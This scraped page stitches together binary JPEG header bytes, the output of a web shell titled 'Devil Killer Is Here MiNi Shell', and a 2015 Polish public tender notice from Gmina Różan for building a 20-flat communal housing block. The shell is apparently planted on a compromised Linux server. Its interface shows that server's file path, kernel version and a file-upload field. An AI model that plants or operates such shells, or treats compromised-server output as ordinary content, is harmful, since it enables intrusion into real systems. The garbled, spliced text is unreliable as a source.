JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150203/23848-N-2015.html

<p class="kh_header"><b>Różan: Budowa budynku komunalnego  w Różanie</b><br>
<b>Numer ogłoszenia: 23848 - 2015; data zamieszczenia: 03.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Różan , Plac Obrońców Różana 4, 06-230 Różan, tel. 029 7679120, faks 029 7679121.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa budynku komunalnego  w Różanie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa budynku komunalnego mieszkalnego wielorodzinnego, czterokondygnacyjnego podpiwniczonego, z jedną klatką schodową przy ulicy Szkolnej w Różanie.
Powierzchnia zabudowy budynku 340 m2,powierzchnia użytkowa kondygnacji mieszkalnych 991,41 m2 ,powierzchnia całkowita 1248,41 m2,kubatura 3904 m3,
liczba lokali mieszkalnych - 20 .
Roboty rozbiórkowe;usunięcie starego fundamentu o grubości ścian 30cm, zlokalizowanego na powierzchni6,8 m x 17m =115,6 m2.
Roboty budowlane:Roboty ziemne:  fundamenty żelbetowe monolityczne,
ściany piwnic żelbetowe grb. 30cm,ściany zewnętrzne z bloczków z betonu komórkowego ( gazobeton) grb.30 cm,ściany wewnętrzne z bloczków piano lub gazobetonowych grb. 24 i  12 cm ,żelbetowe belki i podciągi , schody żelbetowe, nadproża prefabrykowane, płyty stropowe kanałowe SMART. 
Ocieplenie ścian budynku płytami styropianowymi grb. 15 cm ,wyprawa elewacyjna cienkowarstwowa baranek gr. 1,5 mm,malowanie tynków zewnętrznych farbami silikonowymi ,okładzina elewacyjna z płyt kamiennych granit groszkowany ,
okładanie części elewacji blachą powlekaną wraz z obróbkami w kolorze grafit.
Izolacje cieplne i przeciwdźwiękowe poziome  z płyt styropianowych gr. 5 cm, 
izolacje przeciwwilgociowe powłokowe ,izolacje przeciwwilgociowe ścian piwnic z papy termozgrzewalnej,izolacje posadzek z folii polietylenowej. 
Tynki wewnętrzne ścian i stropów cementowo wapienne,wewnętrzne gładzie gipsowe ścian i sufitów.Malowanie tynków wewnętrznych farbami akrylowymi zmywalnymi 
Licowanie ścian płytkami ceramicznymi w pomieszczeniach łazienek na wysokość 2 metrów oraz fartuchy w pomieszczeniach kuchni.
Posadzki w pomieszczeniach łazienek korytarze i aneksy kuchenne z płytek typu gres 
Okładziny schodów wewnętrznych z płytek typu gres,cokoliki typu gres . 
Okładziny  schodów zewnętrznych z płyt kamiennych, antypoślizgowych .
Montaż zabudowy kuchennej 20 sztuk.
Kuchenki gazowe czteropalnikowe z  piekarnikiem elektrycznym oraz niezbędnym osprzętem-20 sztuk,lustra 20 sztuk.
Montaż pochwytów dla niepełnosprawnych w pięciu lokalach mieszkalnych.
W pokojach panele podłogowe klasy AC IV .Kanały wentylacyjne z pustaków ceramicznych,kanały spalinowe z pustaków ceramicznych z wkładem kamionkowym oraz nasadami kominowymi.
Okładanie kominów płytkami gr. 6 cm .Więźba dachowa o konstrukcji drewnianej:(  wiatrownice, kleszcze, miecze, zastrzały, słupy, płatwie, podwaliny, murłaty. 
Ołacenie połaci dachowych łatami o wymiarach 38x50mm.
Folia paro przepuszczalna .Pokrycie blachą powlekaną łączoną na Rabek podwójny stojący wraz z obróbkami kolor grafit.
Izolacja cieplna więźby dachowej wełna mineralna grb. 15 cm.Montaż rynien i rur spustowych z blachy ocynkowanej,montaż wyłazu dachowego,przygotowanie rusztowań zewnętrznych. 
Montaż drzwi aluminiowych zewnętrznych,montaż drzwi jednoskrzydłowych zewnętrznych z PCV - drzwi balkonowe , szkło bezpieczne. 
Montaż drzwi stalowych jednoskrzydłowych 
Montaż drzwi wewnętrznych dwuskrzydłowych z PCV 
Montaż drzwi wewnętrznych łazienkowych płytowe z przeszkleniem
Montaż drzwi wewnętrznych pokojowych płytowe z przeszkleniem
Montaż drzwi wewnętrznych wejściowych płytowe pełne
Montaż drzwi jednoskrzydłowych do komórek lokatorskich
Montaż okien rozwieralno- uchylnych z PCV 
Ławki zewnętrzne sztuk 2
Kosz na śmieci sztuk 2
Wycieraczka sztuk 1
Śmietnik wolnostojący o pow. 15 m2 na własnym fundamencie 1 kpl.
Zgodnie z projektem technicznym, przedmiarem robót oraz specyfikacją techniczną wykonania i odbioru robót.
Parkingi , dojścia i dojazdy
Roboty ziemne
Krawężniki betonowe na ławie betonowej 
Nawierzchnie z kostki brukowej betonowej grb.8 cm 
Roboty ziemne wyk. koparkami uprzednio zmagazynowanej w hałdach ziemi, humusowanie z obsianiem trawą .
Roboty sanitarne: wykonanie przyłącza wodociągowego:demontaż odcinka istniejącego rurociągu o 63 mm ,wykonanie przyłącza kanalizacyjnego z rur kanalizacyjnych PE o 110 mm, wraz z wykopem, zasypaniem wykopu i odtworzeniem terenu do stanu pierwotnego,montaż hydrantu naziemnego o 80 mm ,
montaż zasuw ,podziemne i naziemne oznakowanie trasy rurociągu,szafka podtynkowa do zabudowy zestawu wodomierzowego z wyposażeniem .
Wykonanie przyłącza kanalizacji sanitarnej z rur PCV o 200 mm, wraz z wykopem, zasypaniem wykopu i przywróceniem terenu do stanu pierwotnego,wykonanie studni rewizyjnej z kręgów betonowych o o 1200 mm. 
Instalacja centralnego ogrzewania:rurociągi w instalacjach c.o. w kotłowni stalowe, 
rurociągi w instalacjach c.o. w pomieszczeniach mieszkalnych  z tworzyw sztucznych 
PEX/AL/PEX o o zewnętrznej 16 mm o połączeniach w bruzdach ściennych  
Szafki z rozdzielaczami typu SWP-1, SWN-1 do instalacji c.o. o ilości obwodów 4 z zaworami odcinającymi, odpowietrzającymi, spustowymi 
Montaż kompaktowych liczników ciepła Cosmo HEAT 2 
Rury przyłączne z tworzyw sztucznych o o 16 mm do grzejników
Grzejniki stalowe jednopłytowe Purmo wraz z zestawami przyłączeniowymi i zaworami z głowicą termostatyczną
Wykonanie płukania  i próby szczelności instalacji c.o.
Zgodnie z projektem technicznym, przedmiarem robót oraz specyfikacją techniczną wykonania i odbioru robót.
Instalacja wodno- kanalizacyjna:rurociągi kanalizacyjne z PCV, długości i średnice zgodnie z projektem i przedmiarem robót.
Płukanie , dezynfekcja i próby szczelności instalacji wewnętrznych w budynku
Badania próbek wody i uzyskanie pozytywnych wyników 
Montaż podgrzewaczy elektrycznych wody Bawar ClasicOW-E80.1 - 20szt
Montaż umywalek pojedynczych porcelanowych z syfonem, baterią i pół postumentem - 20 kpl
Ustępy z płuczką typu kompakt  - 20 kpl
Wanny łazienkowe z tworzywa z obudową , z syfonem, baterią , materiałem i robocizną  - 15 szt
Wpusty brodzikowe podłogowe z kotarą, z syfonem, baterią , materiałem i robocizną  - 5 szt.
Zlewozmywaki jednokomorowe z blachy nierdzewnej montowane na szafce, z syfonem, baterią , materiałem i robocizną  - 20 szt
Wodomierze skrzydełkowe domowe 21 sztuk
Szafki podtynkowe do zabudowy zestawów wodomierzowych  
Kotłownia:
Kocioł typ Q EKO DUO o mocy 65 kW 1 szt wraz z osprzętem ( pompy, zawory, naczynia wzbiorcze, manometry, termostaty, filtry, rozdzielacze, rurociągi, kształtki), materiałem i robocizną, zgodnie z projektem, przedmiarem robót oraz specyfikacją techniczna wykonania i odbioru robót.
Próby szczelności, płukanie, uruchomienie i przeszkolenie pracowników w zakresie obsługi i dozoru

Roboty elektryczne
Wykonanie szafy rozdzielczej z układem pomiarowo rozliczeniowym o masie powyżej .Układanie kabli w rurkach lub kanałach zgodnie z projektem branża elektryczna , przedmiarem robót oraz specyfikacją techniczna wykonania i odbioru robót.
Roboty elektryczne 
Montaż rozdzielnic, tablic, opraw oświetleniowych 
Montaż przewodów kabelkowych i materiały pomocnicze : puszki, korytka, łączniki, konstrukcje wsporcze
Przyciski  dzwonek z puszką podtynkowe 
Gniazda instalacyjne wtyczkowe ze stykiem ochronnym podtynkowe podwójne 250 szt
Gniazda instalacyjne wtyczkowe ze stykiem ochronnym bryzgoszczelne 62 szt
Przewody uziemiające i wyrównawcze bednarka 25x4 - 81 mb
Przewody uziemiające i wyrównawcze p/t-LgY
Materiały pomocnicze : korytka, łączniki, konstrukcje wsporcze
Badania i pomiary instalacji elektrycznej i odgromowej
Instalacja domofonowa dla 20 lokali mieszkalnych zgodnie z projektem
Instalacja odgromowa:
- zwody pionowe, przewody inst. odgromowej nie naprężane ( drut okrągły) poziome 
Iglice odgromowe AN-90C, Iglice odgromowe AN-80A 
Przewody uziemiające i wyrównawcze mocowane na wspornikach ściennych 
( bednarka stalowa 30x4)
Przewody uziemiające i wyrównawcze ułożone luzem , uziom fundamentowy 
( bednarka stalowa 30x4). Badania i pomiary instalacji uziemiającej i piorunochronnej
Zgodnie z projektem , przedmiarem robót oraz specyfikacja techniczną wykonania i odbioru robót.
Oświetlenie terenu
Montaż i stawianie słupów o masie do 100 kilogramów - 4 szt.
Oprawy oświetlenia zewnętrznego na słupie - ELBA MH 100W/ROSA/ - 4 szt
Układanie kabli w rurach i w wykpie YKY 5x4 - 91 mb
Montaż uziomów bednarka 
Badania i pomiary linii kablowej N.N. 
Do obowiązków Wykonawcy należy: zabezpieczenie terenu budowy, oznakowanie terenu budowy, obsługa geodezyjna ( tyczenie i inwentaryzacja powykonawcza),
- uzyskanie  pozwolenia na użytkowanie budynku
Zamawiający informuje , że:
-  dopuszcza możliwość fakturowania wykonanych robót w dwóch częściach (po wykonaniu stanu surowego  zamkniętego i faktura końcowa  po zakończeniu robót w oparciu o protokół odbioru końcowego przedmiotu zamówienia).
-  jest to budynek wielomieszkaniowy  zaliczany  do budownictwa objętego społecznym programem mieszkaniowym.
Zamawiający wymaga aby Wykonawca do realizacji tego zadania zatrudnił na umowę  o pracę lub umowę - zlecenie co najmniej 3 osoby na stanowiskach robotniczych z terenu Gminy Różan..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 45.26.22.10-6, 45.26.23.00-4, 45.26.10.00-4, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 19.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 70000,00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że wykonał co najmniej dwie  roboty budowlane obejmujące swoim zakresem budowę lub przebudowę obiektów kubaturowych przeznaczonych na pobyt ludzi  (budynków mieszkalnych wielorodzinnych ) o wartości nie mniejszej niż 2 000 000,00 zł każdy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie osobami, które będą uczestniczyć w realizacji zamówienia, legitymującymi się kwalifikacjami zawodowymi określonymi poniżej:Kierownik Budowy - specjalista w zakresie branży ogólnobudwlanej posiadający:uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w  sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do kierowania robotami budowlanymi branży drogowej objętymi niniejszym zamówieniem;
Kierownik robót sanitarnych posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności sanitarnej w zakresie sieci, instalacji i  urządzeń cieplnych, wentylacyjnych ,wodociągowych i kanalizacyjnych zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w  sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do kierowania robotami budowlanymi branży drogowej objętymi niniejszym zamówieniem;
Kierownik robót elektrycznych  posiadający uprawnienia budowlane do kierowania robotami elektrycznymi  w zakresie sieci  i  urządzeń  elektrycznych zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w  sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do kierowania robotami budowlanymi branży drogowej objętymi niniejszym zamówieniem;
Kierownik robót drogowych  specjalista w zakresie branży drogowej posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w  sprawie samodzielnych funkcji technicznych w budownictwie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do kierowania robotami budowlanymi branży drogowej objętymi niniejszym zamówieniem;

Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień dopuszcza odpowiadające im kwalifikacje zawodowe uprawniające do kierowania robotami budowlanymi w danej specjalności nabyte w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz w państwach Europejskiego Obszaru Gospodarczego, stosownie do przepisu art. 12 a ustawy Prawo budowlane oraz przepisów ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz.394)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie  prowadzonej działalności gospodarczej w wysokości co najmniej 2 000 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 5</li>
<li>3 - Termin - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku    do treści oferty na podstawie, której dokonano wyboru wykonawcy i określa następujące warunki takich zmian:
1) termin realizacji przedmiotu umowy w przypadku:
a)wystąpienia okoliczności niezależnych od Wykonawcy, których nie mógł przewidzieć przy zachowaniu należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia, a w szczególności:
konieczności wykonania robót niezbędnych, zamiennych, dodatkowych, których wykonanie wpływa na zmianę terminu wykonania zamówienia podstawowego,
 okoliczności zaistniałych w trakcie realizacji przedmiotu umowy, tj. warunki atmosferyczne, kolizje utrudniające lub uniemożliwiające terminowe wykonanie przedmiotu umowy.
b) wstrzymania przez Zamawiającego wykonania robót niewynikających z okoliczności leżących po stronie Wykonawcy. Nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru Zamawiającego w przypadku stwierdzenia nieprawidłowości zawinionych przez Wykonawcę,
c)konieczności wykonania przez Zamawiającego korekty projektu dla usunięcia wad dostarczonej dokumentacji.
W przypadku zmiany terminu realizacji przedmiotu umowy, wymienionych w literach a-c, termin ten może ulec przedłużeniu nie dłużej jednak niż o czas trwania tych okoliczności.
2)wysokość ceny ryczałtowej brutto w przypadku zmiany stawki podatku VAT dla robót objętych przedmiotem zamówienia
W trakcie realizacji przedmiotu umowy, strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za roboty, których w dniu zmiany stawki podatku VAT jeszcze nie wykonano.
3)zakresu rzeczowo - finansowego zamówienia w przypadku wystąpienia obiektywnych okoliczności skutkujących koniecznością zmiany w trakcie realizacji umowy zakresu rzeczowo - finansowego robót
4)forma zabezpieczenia należytego wykonania umowy - zgodnie z art. 149 ust.1 u.p.z.p.
5)zmiana kierownika budowy w przypadku:
a)śmierci, choroby, rezygnacji, zwolnienia osoby lub innych zdarzeń losowych dotyczących kierownika budowy.
W przypadku zmiany kierownika budowy, nowy kierownik musi spełniać wymagania określone w SIWZ dla kierownika budowy.
6)  możliwość powierzenia wykonania części robót podwykonawcy robót, których zakres nie został wskazany  w ofercie przez  Wykonawcę jako przeznaczony do wykonania przez podwykonawców.
Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rozan.bipgminy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Różanie, Plac Obrońców Różana 4, 06-230 Różan.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2015 godzina 10:00, miejsce: Urząd Gminy w Różanie, Plac Obrońców Różana 4, 06-230 Różan , pok.nr 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





